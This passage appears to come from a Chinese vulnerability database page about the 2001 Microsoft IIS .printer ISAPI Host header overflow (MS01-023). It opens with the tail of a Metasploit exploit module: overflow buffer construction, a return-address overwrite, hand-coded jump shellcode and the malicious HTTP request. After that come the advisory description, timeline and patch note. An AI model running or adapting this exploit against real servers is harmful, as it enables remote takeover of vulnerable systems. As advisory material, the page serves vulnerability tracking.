			return Exploit::CheckCode::Vulnerable
		end
		
		return Exploit::CheckCode::Safe
	end
	
	def exploit
		connect
		
		buf = make_nops(280)
		buf[268, 4] = [target.ret].pack('V')
		
		# payload is at: [ebx + 96] + 256 + 64
		buf << "\x8b\x4b\x60"        # mov ecx, [ebx + 96]
		buf << "\x80\xc1\x40"        # add cl, 64
		buf << "\x80\xc5\x01"        # add ch, 1
		buf << "\xff\xe1"            # jmp ecx		
	
		sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")

		handler
		disconnect
	end

end
    

- 漏洞信息

3323
Microsoft IIS ISAPI .printer Extension Host Header Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified, Third-party Verified

- 漏洞描述

Microsoft IIS contains a flaw that allows a remote attacker to execute arbitrary code on a vulnerable server. The issue is due to the .printer ISAPI (Internet Services Application Programming Interface) Internet Printing Protocol (IPP) filter, handled by \WINNT\System32\msw3prt.dll, containing a buffer overflow. When a buffer of 420 bytes is sent within the HTTP Host: header of a .printer ISAPI request, the buffer is overflowed allowing the attacker to overwrite the EIP register and execute arbitrary code with SYSTEM access.

- 时间线

2001-05-01 Unknow
2001-05-07 2001-05-01

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch (MS01-023) to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站